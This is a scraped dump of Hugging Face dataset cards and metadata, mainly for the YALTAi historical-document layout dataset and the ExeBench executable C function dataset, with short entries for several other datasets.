"## Links\n- Pre-print: URL\n- Code: URL"
] |
65d7baf884b0ca8c02ad1f678b83904ccc1d2062 |
# YALTAi Tabular Dataset
## Table of Contents
- [YALTAi Tabular Dataset](#YALTAi-Tabular-Dataset)
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Initial Data Collection and Normalization](#initial-data-collection-and-normalization)
- [Who are the source language producers?](#who-are-the-source-language-producers)
- [Annotations](#annotations)
- [Annotation process](#annotation-process)
- [Who are the annotators?](#who-are-the-annotators)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** [https://doi.org/10.5281/zenodo.6827706](https://doi.org/10.5281/zenodo.6827706)
- **Paper:** [https://arxiv.org/abs/2207.11230](https://arxiv.org/abs/2207.11230)
### Dataset Summary
This dataset contains a subset of data used in the paper [You Actually Look Twice At it (YALTAi): using an object detection approach instead of region segmentation within the Kraken engine](https://arxiv.org/abs/2207.11230). This paper proposes treating page layout recognition on historical documents as an object detection task (compared to the usual pixel segmentation approach). This dataset covers pages with tabular information with the following objects "Header", "Col", "Marginal", "text".
### Supported Tasks and Leaderboards
- `object-detection`: This dataset can be used to train a model for object-detection on historic document images.
## Dataset Structure
This dataset has two configurations. These configurations both cover the same data and annotations but provide these annotations in different forms to make it easier to integrate the data with existing processing pipelines.
- The first configuration, `YOLO`, uses the data's original format.
- The second configuration converts the YOLO format into a format which is closer to the `COCO` annotation format. This is done to make it easier to work with the `feature_extractor`s from the `Transformers` models for object detection, which expect data to be in a COCO style format.
### Data Instances
An example instance from the COCO config:
```
{'height': 2944,
'image': <PIL.PngImagePlugin.PngImageFile image mode=L size=2064x2944 at 0x7FA413CDA210>,
'image_id': 0,
'objects': [{'area': 435956,
'bbox': [0.0, 244.0, 1493.0, 292.0],
'category_id': 0,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 88234,
'bbox': [305.0, 127.0, 562.0, 157.0],
'category_id': 2,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 5244,
'bbox': [1416.0, 196.0, 92.0, 57.0],
'category_id': 2,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 5720,
'bbox': [1681.0, 182.0, 88.0, 65.0],
'category_id': 2,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 374085,
'bbox': [0.0, 540.0, 163.0, 2295.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 577599,
'bbox': [104.0, 537.0, 253.0, 2283.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 598670,
'bbox': [304.0, 533.0, 262.0, 2285.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 56,
'bbox': [284.0, 539.0, 8.0, 7.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 1868412,
'bbox': [498.0, 513.0, 812.0, 2301.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 307800,
'bbox': [1250.0, 512.0, 135.0, 2280.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 494109,
'bbox': [1330.0, 503.0, 217.0, 2277.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 52,
'bbox': [1734.0, 1013.0, 4.0, 13.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 90666,
'bbox': [0.0, 1151.0, 54.0, 1679.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []}],
'width': 2064}
```
An example instance from the YOLO config:
``` python
{'image': <PIL.PngImagePlugin.PngImageFile image mode=L size=2064x2944 at 0x7FAA140F2450>,
'objects': {'bbox': [[747, 390, 1493, 292],
[586, 206, 562, 157],
[1463, 225, 92, 57],
[1725, 215, 88, 65],
[80, 1688, 163, 2295],
[231, 1678, 253, 2283],
[435, 1675, 262, 2285],
[288, 543, 8, 7],
[905, 1663, 812, 2301],
[1318, 1653, 135, 2280],
[1439, 1642, 217, 2277],
[1737, 1019, 4, 13],
[26, 1991, 54, 1679]],
'label': [0, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1]}}
```
### Data Fields
The fields for the YOLO config:
- `image`: the image
- `objects`: the annotations which consist of:
- `bbox`: a list of bounding boxes for the image
- `label`: a list of labels for this image
The fields for the COCO config:
- `height`: height of the image
- `width`: width of the image
- `image`: image
- `image_id`: id for the image
- `objects`: annotations in COCO format, consisting of a list containing dictionaries with the following keys:
- `bbox`: bounding boxes for the images
- `category_id`: a label for the image
- `image_id`: id for the image
- `iscrowd`: COCO `iscrowd` flag
- `segmentation`: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)
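As a minimal sketch of working with these fields, the snippet below assumes the two configurations are exposed under the names `YOLO` and `COCO` used above; judging from the paired instances, the YOLO-style boxes appear to be `[x_center, y_center, width, height]` in pixels.

```python
from datasets import load_dataset

# Load the YOLO-style configuration (config name assumed from the description).
yolo = load_dataset("biglam/yalta_ai_tabular_dataset", "YOLO", split="train")
example = yolo[0]
for (xc, yc, w, h), label in zip(example["objects"]["bbox"], example["objects"]["label"]):
    # Convert a center-format box to the COCO-style [x_min, y_min, width, height].
    coco_box = [xc - w / 2, yc - h / 2, w, h]
    print(label, coco_box)
```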
### Data Splits
The dataset contains a train, validation and test split with the following numbers per split:
| | train | validation | test |
|----------|-------|------------|------|
| examples | 196 | 22 | 135 |
## Dataset Creation
> [this] dataset was produced using a single source, the Lectaurep Repertoires dataset [Rostaing et al., 2021], which served as a basis for only the training and development split. The testset is composed of original data, from various documents, from the 17th century up to the early 20th with a single soldier war report. The test set is voluntarily very different and out of domain with column borders that are not drawn nor printed in certain cases, layout in some kind of masonry layout. p.8
.
### Curation Rationale
This dataset was created to produce a simplified version of the [Lectaurep Repertoires dataset](https://github.com/HTR-United/lectaurep-repertoires), which was found to contain:
> around 16 different ways to describe columns, from Col1 to Col7, the case-different col1-col7 and finally ColPair and ColOdd, which we all reduced to Col p.8
### Source Data
#### Initial Data Collection and Normalization
The LECTAUREP (LECTure Automatique de REPertoires) project, which began in 2018, is a joint initiative of the Minutier central des notaires de Paris of the National Archives, the [ALMAnaCH (Automatic Language Modeling and Analysis & Computational Humanities)](https://www.inria.fr/en/almanach) team at Inria, and the EPHE (Ecole Pratique des Hautes Etudes), in partnership with the Ministry of Culture.
> The lectaurep-bronod corpus brings together 100 pages from the repertoire of Maître Louis Bronod (1719-1765), notary in Paris from December 13, 1719 to July 23, 1765. The pages concerned were written during the years 1742 to 1745.
#### Who are the source language producers?
[More information needed]
### Annotations
| | Train | Dev | Test | Total | Average area | Median area |
|----------|-------|-----|------|-------|--------------|-------------|
| Col | 724 | 105 | 829 | 1658 | 9.32 | 6.33 |
| Header | 103 | 15 | 42 | 160 | 6.78 | 7.10 |
| Marginal | 60 | 8 | 0 | 68 | 0.70 | 0.71 |
| Text | 13 | 5 | 0 | 18 | 0.01 | 0.00 |
#### Annotation process
[More information needed]
#### Who are the annotators?
[More information needed]
### Personal and Sensitive Information
This data does not contain information relating to living individuals.
## Considerations for Using the Data
### Social Impact of Dataset
A growing number of datasets are related to page layout for historical documents. This dataset offers a different approach to annotating these datasets (focusing on object detection rather than pixel-level annotations). Improving document layout recognition can have a positive impact on downstream tasks, in particular Optical Character Recognition.
### Discussion of Biases
Historical documents contain a wide variety of page layouts. This means that the ability of models trained on this dataset to transfer to documents with very different layouts is not guaranteed.
### Other Known Limitations
[More information needed]
## Additional Information
### Dataset Curators
### Licensing Information
[Creative Commons Attribution 4.0 International](https://creativecommons.org/licenses/by/4.0/legalcode)
### Citation Information
```
@dataset{clerice_thibault_2022_6827706,
author = {Clérice, Thibault},
title = {YALTAi: Tabular Dataset},
month = jul,
year = 2022,
publisher = {Zenodo},
version = {1.0.0},
doi = {10.5281/zenodo.6827706},
url = {https://doi.org/10.5281/zenodo.6827706}
}
```
[](https://doi.org/10.5281/zenodo.6827706)
### Contributions
Thanks to [@davanstrien](https://github.com/davanstrien) for adding this dataset.
| biglam/yalta_ai_tabular_dataset | [
"task_categories:object-detection",
"annotations_creators:expert-generated",
"language_creators:expert-generated",
"size_categories:n<1K",
"license:cc-by-4.0",
"manuscripts",
"LAM",
"arxiv:2207.11230",
"region:us"
] | 2022-07-29T06:02:34+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["expert-generated"], "language": [], "license": ["cc-by-4.0"], "multilinguality": [], "size_categories": ["n<1K"], "source_datasets": [], "task_categories": ["object-detection"], "task_ids": [], "pretty_name": "YALTAi Tabular Dataset", "tags": ["manuscripts", "LAM"]} | 2022-10-23T20:56:38+00:00 | [
"2207.11230"
] | [] | TAGS
#task_categories-object-detection #annotations_creators-expert-generated #language_creators-expert-generated #size_categories-n<1K #license-cc-by-4.0 #manuscripts #LAM #arxiv-2207.11230 #region-us
| YALTAi Tabular Dataset
======================
Table of Contents
-----------------
* YALTAi Tabular Dataset
+ Table of Contents
+ Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
+ Dataset Structure
- Data Instances
- Data Fields
- Data Splits
+ Dataset Creation
- Curation Rationale
- Source Data
* Initial Data Collection and Normalization
* Who are the source language producers?
- Annotations
* Annotation process
* Who are the annotators?
- Personal and Sensitive Information
+ Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
+ Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
Dataset Description
-------------------
* Homepage: URL
* Paper: URL
### Dataset Summary
This dataset contains a subset of data used in the paper You Actually Look Twice At it (YALTAi): using an object detection approach instead of region segmentation within the Kraken engine. This paper proposes treating page layout recognition on historical documents as an object detection task (compared to the usual pixel segmentation approach). This dataset covers pages with tabular information with the following objects "Header", "Col", "Marginal", "text".
### Supported Tasks and Leaderboards
* 'object-detection': This dataset can be used to train a model for object-detection on historic document images.
Dataset Structure
-----------------
This dataset has two configurations. These configurations both cover the same data and annotations but provide these annotations in different forms to make it easier to integrate the data with existing processing pipelines.
* The first configuration, 'YOLO', uses the data's original format.
* The second configuration converts the YOLO format into a format which is closer to the 'COCO' annotation format. This is done to make it easier to work with the 'feature\_extractor's from the 'Transformers' models for object detection, which expect data to be in a COCO style format.
### Data Instances
An example instance from the COCO config:
An example instance from the YOLO config:
### Data Fields
The fields for the YOLO config:
* 'image': the image
* 'objects': the annotations which consist of:
+ 'bbox': a list of bounding boxes for the image
+ 'label': a list of labels for this image
The fields for the COCO config:
* 'height': height of the image
* 'width': width of the image
* 'image': image
* 'image\_id': id for the image
* 'objects': annotations in COCO format, consisting of a list containing dictionaries with the following keys:
+ 'bbox': bounding boxes for the images
+ 'category\_id': a label for the image
+ 'image\_id': id for the image
+ 'iscrowd': COCO 'iscrowd' flag
+ 'segmentation': COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)
### Data Splits
The dataset contains a train, validation and test split with the following numbers per split:
Dataset Creation
----------------
>
> [this] dataset was produced using a single source, the Lectaurep Repertoires dataset [Rostaing et al., 2021], which served as a basis for only the training and development split. The testset is composed of original data, from various documents, from the 17th century up to the early 20th with a single soldier war report. The test set is voluntarily very different and out of domain with column borders that are not drawn nor printed in certain cases, layout in some kind of masonry layout. p.8
> .
>
>
>
### Curation Rationale
This dataset was created to produce a simplified version of the Lectaurep Repertoires dataset, which was found to contain:
>
> around 16 different ways to describe columns, from Col1 to Col7, the case-different col1-col7 and finally ColPair and ColOdd, which we all reduced to Col p.8
>
>
>
### Source Data
#### Initial Data Collection and Normalization
The LECTAUREP (LECTure Automatique de REPertoires) project, which began in 2018, is a joint initiative of the Minutier central des notaires de Paris of the National Archives, the ALMAnaCH (Automatic Language Modeling and Analysis & Computational Humanities) team at Inria, and the EPHE (Ecole Pratique des Hautes Etudes), in partnership with the Ministry of Culture.
>
> The lectaurep-bronod corpus brings together 100 pages from the repertoire of Maître Louis Bronod (1719-1765), notary in Paris from December 13, 1719 to July 23, 1765. The pages concerned were written during the years 1742 to 1745.
>
>
>
#### Who are the source language producers?
[More information needed]
### Annotations
#### Annotation process
[More information needed]
#### Who are the annotators?
[More information needed]
### Personal and Sensitive Information
This data does not contain information relating to living individuals.
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
A growing number of datasets are related to page layout for historical documents. This dataset offers a different approach to annotating these datasets (focusing on object detection rather than pixel-level annotations). Improving document layout recognition can have a positive impact on downstream tasks, in particular Optical Character Recognition.
### Discussion of Biases
Historical documents contain a wide variety of page layouts. This means that the ability of models trained on this dataset to transfer to documents with very different layouts is not guaranteed.
### Other Known Limitations
[More information needed]
Additional Information
----------------------
### Dataset Curators
### Licensing Information
Creative Commons Attribution 4.0 International
| [
 "### Dataset Summary\n\nThis dataset contains a subset of data used in the paper You Actually Look Twice At it (YALTAi): using an object detection approach instead of region segmentation within the Kraken engine. This paper proposes treating page layout recognition on historical documents as an object detection task (compared to the usual pixel segmentation approach). This dataset covers pages with tabular information with the following objects \"Header\", \"Col\", \"Marginal\", \"text\".",
"### Supported Tasks and Leaderboards\n\n\n* 'object-detection': This dataset can be used to train a model for object-detection on historic document images.\n\n\nDataset Structure\n-----------------\n\n\nThis dataset has two configurations. These configurations both cover the same data and annotations but provide these annotations in different forms to make it easier to integrate the data with existing processing pipelines.\n\n\n* The first configuration, 'YOLO', uses the data's original format.\n* The second configuration converts the YOLO format into a format which is closer to the 'COCO' annotation format. This is done to make it easier to work with the 'feature\\_extractor's from the 'Transformers' models for object detection, which expect data to be in a COCO style format.",
"### Data Instances\n\n\nAn example instance from the COCO config:\n\n\nAn example instance from the YOLO config:",
"### Data Fields\n\n\nThe fields for the YOLO config:\n\n\n* 'image': the image\n* 'objects': the annotations which consist of:\n\t+ 'bbox': a list of bounding boxes for the image\n\t+ 'label': a list of labels for this image\n\n\nThe fields for the COCO config:\n\n\n* 'height': height of the image\n* 'width': width of the image\n* 'image': image\n* 'image\\_id': id for the image\n* 'objects': annotations in COCO format, consisting of a list containing dictionaries with the following keys:\n\t+ 'bbox': bounding boxes for the images\n\t+ 'category\\_id': a label for the image\n\t+ 'image\\_id': id for the image\n\t+ 'iscrowd': COCO 'iscrowd' flag\n\t+ 'segmentation': COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)",
"### Data Splits\n\n\nThe dataset contains a train, validation and test split with the following numbers per split:\n\n\n\nDataset Creation\n----------------\n\n\n\n> \n> [this] dataset was produced using a single source, the Lectaurep Repertoires dataset [Rostaing et al., 2021], which served as a basis for only the training and development split. The testset is composed of original data, from various documents, from the 17th century up to the early 20th with a single soldier war report. The test set is voluntarily very different and out of domain with column borders that are not drawn nor printed in certain cases, layout in some kind of masonry layout. p.8\n> .\n> \n> \n>",
"### Curation Rationale\n\n\nThis dataset was created to produce a simplified version of the Lectaurep Repertoires dataset, which was found to contain:\n\n\n\n> \n> around 16 different ways to describe columns, from Col1 to Col7, the case-different col1-col7 and finally ColPair and ColOdd, which we all reduced to Col p.8\n> \n> \n>",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe LECTAUREP (LECTure Automatique de REPertoires) project, which began in 2018, is a joint initiative of the Minutier central des notaires de Paris, the National Archives and the\nMinutier central des notaires de Paris of the National Archives, the ALMAnaCH (Automatic Language Modeling and Analysis & Computational Humanities) team at Inria and the EPHE (Ecole Pratique des Hautes Etudes), in partnership with the Ministry of Culture.\n\n\n\n> \n> The lectaurep-bronod corpus brings together 100 pages from the repertoire of Maître Louis Bronod (1719-1765), notary in Paris from December 13, 1719 to July 23, 1765. The pages concerned were written during the years 1742 to 1745.\n> \n> \n>",
"#### Who are the source language producers?\n\n\n[More information needed]",
"### Annotations",
"#### Annotation process\n\n\n[More information needed]",
"#### Who are the annotators?\n\n\n[More information needed]",
"### Personal and Sensitive Information\n\n\nThis data does not contain information relating to living individuals.\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\nA growing number of datasets are related to page layout for historical documents. This dataset offers a different approach to annotating these datasets (focusing on object detection rather than pixel-level annotations). Improving document layout recognition can have a positive impact on downstream tasks, in particular Optical Character Recognition.",
"### Discussion of Biases\n\n\nHistorical documents contain a wide variety of page layouts. This means that the ability of models trained on this dataset to transfer to documents with very different layouts is not guaranteed.",
"### Other Known Limitations\n\n\n[More information needed]\n\n\nAdditional Information\n----------------------",
"### Dataset Curators",
"### Licensing Information\n\n\nCreative Commons Attribution 4.0 International\n\n\n: using an object detectionapproach instead of region segmentation within the Kraken engine. This paper proposes treating page layout recognition on historical documents as an object detection task (compared to the usual pixel segmentation approach). This dataset covers pages with tabular information with the following objects \"Header\", \"Col\", \"Marginal\", \"text\".",
"### Supported Tasks and Leaderboards\n\n\n* 'object-detection': This dataset can be used to train a model for object-detection on historic document images.\n\n\nDataset Structure\n-----------------\n\n\nThis dataset has two configurations. These configurations both cover the same data and annotations but provide these annotations in different forms to make it easier to integrate the data with existing processing pipelines.\n\n\n* The first configuration, 'YOLO', uses the data's original format.\n* The second configuration converts the YOLO format into a format which is closer to the 'COCO' annotation format. This is done to make it easier to work with the 'feature\\_extractor's from the 'Transformers' models for object detection, which expect data to be in a COCO style format.",
"### Data Instances\n\n\nAn example instance from the COCO config:\n\n\nAn example instance from the YOLO config:",
"### Data Fields\n\n\nThe fields for the YOLO config:\n\n\n* 'image': the image\n* 'objects': the annotations which consist of:\n\t+ 'bbox': a list of bounding boxes for the image\n\t+ 'label': a list of labels for this image\n\n\nThe fields for the COCO config:\n\n\n* 'height': height of the image\n* 'width': width of the image\n* 'image': image\n* 'image\\_id': id for the image\n* 'objects': annotations in COCO format, consisting of a list containing dictionaries with the following keys:\n\t+ 'bbox': bounding boxes for the images\n\t+ 'category\\_id': a label for the image\n\t+ 'image\\_id': id for the image\n\t+ 'iscrowd': COCO 'iscrowd' flag\n\t+ 'segmentation': COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)",
"### Data Splits\n\n\nThe dataset contains a train, validation and test split with the following numbers per split:\n\n\n\nDataset Creation\n----------------\n\n\n\n> \n> [this] dataset was produced using a single source, the Lectaurep Repertoires dataset [Rostaing et al., 2021], which served as a basis for only the training and development split. The testset is composed of original data, from various documents, from the 17th century up to the early 20th with a single soldier war report. The test set is voluntarily very different and out of domain with column borders that are not drawn nor printed in certain cases, layout in some kind of masonry layout. p.8\n> .\n> \n> \n>",
"### Curation Rationale\n\n\nThis dataset was created to produce a simplified version of the Lectaurep Repertoires dataset, which was found to contain:\n\n\n\n> \n> around 16 different ways to describe columns, from Col1 to Col7, the case-different col1-col7 and finally ColPair and ColOdd, which we all reduced to Col p.8\n> \n> \n>",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe LECTAUREP (LECTure Automatique de REPertoires) project, which began in 2018, is a joint initiative of the Minutier central des notaires de Paris, the National Archives and the\nMinutier central des notaires de Paris of the National Archives, the ALMAnaCH (Automatic Language Modeling and Analysis & Computational Humanities) team at Inria and the EPHE (Ecole Pratique des Hautes Etudes), in partnership with the Ministry of Culture.\n\n\n\n> \n> The lectaurep-bronod corpus brings together 100 pages from the repertoire of Maître Louis Bronod (1719-1765), notary in Paris from December 13, 1719 to July 23, 1765. The pages concerned were written during the years 1742 to 1745.\n> \n> \n>",
"#### Who are the source language producers?\n\n\n[More information needed]",
"### Annotations",
"#### Annotation process\n\n\n[More information needed]",
"#### Who are the annotators?\n\n\n[More information needed]",
"### Personal and Sensitive Information\n\n\nThis data does not contain information relating to living individuals.\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\nA growing number of datasets are related to page layout for historical documents. This dataset offers a different approach to annotating these datasets (focusing on object detection rather than pixel-level annotations). Improving document layout recognition can have a positive impact on downstream tasks, in particular Optical Character Recognition.",
"### Discussion of Biases\n\n\nHistorical documents contain a wide variety of page layouts. This means that the ability of models trained on this dataset to transfer to documents with very different layouts is not guaranteed.",
"### Other Known Limitations\n\n\n[More information needed]\n\n\nAdditional Information\n----------------------",
"### Dataset Curators",
"### Licensing Information\n\n\nCreative Commons Attribution 4.0 International\n\n\n.
Usage:
```python
from datasets import load_dataset
ds = load_dataset('Yehor/voa-uk-transcriptions', split='train')
for row in ds:
    print(row['text'])
```
| Yehor/voa-uk-transcriptions | [
"language:uk",
"license:cc-by-4.0",
"region:us"
] | 2022-07-30T10:59:07+00:00 | {"language": ["uk"], "license": "cc-by-4.0"} | 2022-09-10T09:07:34+00:00 | [] | [
"uk"
] | TAGS
#language-Ukrainian #license-cc-by-4.0 #region-us
|
This repository contains transcriptions with other metadata for the VOA Ukrainian dataset (~398h).
Usage:
| [] | [
"TAGS\n#language-Ukrainian #license-cc-by-4.0 #region-us \n"
] |
1c0214d65571139d86b310eadb2e6615be0df374 | FUNSD dataset | JetsonEarth/jet_funsd | [
"region:us"
] | 2022-07-30T13:38:48+00:00 | {} | 2022-07-30T13:49:35+00:00 | [] | [] | TAGS
#region-us
| FUNSD dataset | [] | [
"TAGS\n#region-us \n"
] |
50b19f4267f1528ffa926fe0112935d5bdf17597 | FUNSD | JetsonEarth/jetson_funsd | [
"region:us"
] | 2022-07-30T14:25:09+00:00 | {} | 2022-07-30T14:28:55+00:00 | [] | [] | TAGS
#region-us
| FUNSD | [] | [
"TAGS\n#region-us \n"
] |
093085f8558cfd53de8e2c8f4ccc7b9e73dc22ae | # ExeBench: an ML-scale dataset of executable C functions
ExeBench is a dataset of millions of C functions paired with dependencies and metadata such that at least a subset of it can be executed with IO pairs. It is mainly intended for machine learning applications but it is application-agnostic enough to have other uses.
Please read the paper for more information: https://dl.acm.org/doi/abs/10.1145/3520312.3534867.
Please see `examples/` in https://github.com/jordiae/exebench for examples.
## Usage
### Option 1: Using the helpers in this repo
```
git clone https://github.com/jordiae/exebench.git
cd exebench/
python -m venv venv
source venv/bin/activate
pip install -r requirements_examples.txt
PYTHONPATH="${PYTHONPATH}:$(pwd)" python examples/basic.py
```
### Option 2: Directly using the Hugging Face Datasets library
```
!pip install datasets zstandard
from datasets import load_dataset

# Load one dataset split; in this case, the synthetic test split
dataset = load_dataset('jordiae/exebench', split='test_synth')
for e in dataset:
    ...
```
### Option 3: Directly download the dataset
Take a look at the files at: https://huggingface.co/datasets/jordiae/exebench/tree/main
The dataset consist of directories compressed with TAR. Inside each TAR, there is a series of jsonline files compressed with zstandard.
## Statistics and versions
This release corresponds to ExeBench v1.01, a version with some improvements with respect to the original one presented in the paper. The statistics and studies presented in the paper remain consistent with respect to the new ones. The final splits of the new version consist of the following functions:
```
train_not_compilable: 2.357M
train_synth_compilable: 2.308373M
train_real_compilable: 0.675074M
train_synth_simple_io: 0.550116M
train_real_simple_io: 0.043769M
train_synth_rich_io: 0.097250M
valid_synth: 5k
valid_real: 2.133k
test_synth: 5k
test_real: 2.134k
```
The original dataset (v1.00) with the exact same data studied in the paper can be accessed on request at: https://huggingface.co/datasets/jordiae/exebench_legacy (please reach out for access)
## License
All C functions keep the original license as per their original Github repository (available in the metadata). All ExeBench contributions (I/O examples, boilerplate to run functions, etc) are released with an MIT license.
## Citation
```
@inproceedings{10.1145/3520312.3534867,
author = {Armengol-Estap\'{e}, Jordi and Woodruff, Jackson and Brauckmann, Alexander and Magalh\~{a}es, Jos\'{e} Wesley de Souza and O'Boyle, Michael F. P.},
title = {ExeBench: An ML-Scale Dataset of Executable C Functions},
year = {2022},
isbn = {9781450392730},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
url = {https://doi.org/10.1145/3520312.3534867},
doi = {10.1145/3520312.3534867},
abstract = {Machine-learning promises to transform compilation and software engineering, yet is frequently limited by the scope of available datasets. In particular, there is a lack of runnable, real-world datasets required for a range of tasks ranging from neural program synthesis to machine learning-guided program optimization. We introduce a new dataset, ExeBench, which attempts to address this. It tackles two key issues with real-world code: references to external types and functions and scalable generation of IO examples. ExeBench is the first publicly available dataset that pairs real-world C code taken from GitHub with IO examples that allow these programs to be run. We develop a toolchain that scrapes GitHub, analyzes the code, and generates runnable snippets of code. We analyze our benchmark suite using several metrics, and show it is representative of real-world code. ExeBench contains 4.5M compilable and 700k executable C functions. This scale of executable, real functions will enable the next generation of machine learning-based programming tasks.},
booktitle = {Proceedings of the 6th ACM SIGPLAN International Symposium on Machine Programming},
pages = {50–59},
numpages = {10},
keywords = {Code Dataset, Program Synthesis, Mining Software Repositories, C, Machine Learning for Code, Compilers},
location = {San Diego, CA, USA},
series = {MAPS 2022}
}
```
## Credits
We thank Anghabench authors for their type inference-based synthetic dependencies generation for C functions. This software, Psyche-C, can be found at: https://github.com/ltcmelo/psychec
## Contact
```
jordi.armengol.estape at ed.ac.uk
``` | jordiae/exebench | [
"region:us"
] | 2022-07-30T19:07:06+00:00 | {} | 2023-03-09T16:06:06+00:00 | [] | [] | TAGS
#region-us
| # ExeBench: an ML-scale dataset of executable C functions
ExeBench is a dataset of millions of C functions paired with dependencies and metadata such that at least a subset of it can be executed with IO pairs. It is mainly intended for machine learning applications but it is application-agnostic enough to have other uses.
Please read the paper for more information: URL
Please see 'examples/' in URL for examples.
## Usage
### Option 1: Using the helpers in this repo
### Option 2: Directly using the Hugging Face Datasets library
### Option 3: Directly download the dataset
Take a look at the files at: URL
The dataset consists of directories compressed with TAR. Inside each TAR, there is a series of JSON Lines files compressed with zstandard.
## Statistics and versions
This release corresponds to ExeBench v1.01, a version with some improvements with respect to the original one presented in the paper. The statistics and studies presented in the paper remain consistent with respect to the new ones. The final splits of the new version consist of the following functions:
The original dataset (v1.00) with the exact same data studied in the paper can be accessed on request at: URL (please reach out for access)
## License
All C functions keep the original license as per their original Github repository (available in the metadata). All ExeBench contributions (I/O examples, boilerplate to run functions, etc) are released with an MIT license.
## Credits
We thank Anghabench authors for their type inference-based synthetic dependencies generation for C functions. This software, Psyche-C, can be found at: URL
## Contact
| [
"# ExeBench: an ML-scale dataset of executable C functions\n\nExeBench is a dataset of millions of C functions paired with dependencies and metadatada such that at least a subset of it can be executed with IO pairs. It is mainly inteded for machine learning applications but it is application-agnostic enough to have other usages.\nPlease read the paper for more information: URL\nPlease see 'examples/' in URL for examples.",
"## Usage",
"### Option 1: Using the helpers in this repo",
"### Option 2: Directly using the Hugginface Datasets library",
"### Option 3: Directly download the dataset\n\nTake a look at the files at: URL\nThe dataset consist of directories compressed with TAR. Inside each TAR, there is a series of jsonline files compressed with zstandard.",
"## Statistics and versions\n\nThis release corresponds to ExeBench v1.01, a version with some improvements with respect to the original one presented in the paper. The statistics and studies presented in the paper remain consistent with respect to the new ones. The final splits of the new version consist of the following functions:\n\n\n\n\nThe original dataset (v1.00) with the exact same data studied in the paper can be accessed on request at: URL (please reach out for access)",
"## License\n\nAll C functions keep the original license as per their original Github repository (available in the metadata). All ExeBench contributions (I/O examples, boilerplate to run functions, etc) are released with an MIT license.",
"## Credits\n\nWe thank Anghabench authors for their type inference-based synthetic dependencies generation for C functions. This software, Psyche-C, can be found at: URL",
"## Contact"
] | [
"TAGS\n#region-us \n",
"# ExeBench: an ML-scale dataset of executable C functions\n\nExeBench is a dataset of millions of C functions paired with dependencies and metadatada such that at least a subset of it can be executed with IO pairs. It is mainly inteded for machine learning applications but it is application-agnostic enough to have other usages.\nPlease read the paper for more information: URL\nPlease see 'examples/' in URL for examples.",
"## Usage",
"### Option 1: Using the helpers in this repo",
"### Option 2: Directly using the Hugginface Datasets library",
"### Option 3: Directly download the dataset\n\nTake a look at the files at: URL\nThe dataset consist of directories compressed with TAR. Inside each TAR, there is a series of jsonline files compressed with zstandard.",
"## Statistics and versions\n\nThis release corresponds to ExeBench v1.01, a version with some improvements with respect to the original one presented in the paper. The statistics and studies presented in the paper remain consistent with respect to the new ones. The final splits of the new version consist of the following functions:\n\n\n\n\nThe original dataset (v1.00) with the exact same data studied in the paper can be accessed on request at: URL (please reach out for access)",
"## License\n\nAll C functions keep the original license as per their original Github repository (available in the metadata). All ExeBench contributions (I/O examples, boilerplate to run functions, etc) are released with an MIT license.",
"## Credits\n\nWe thank Anghabench authors for their type inference-based synthetic dependencies generation for C functions. This software, Psyche-C, can be found at: URL",
"## Contact"
] |
d2bde405fafdd53aa4f92ddf03b14a7e7533d660 |
# Dataset Card for xP3
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Additional Information](#additional-information)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Repository:** https://github.com/bigscience-workshop/xmtf
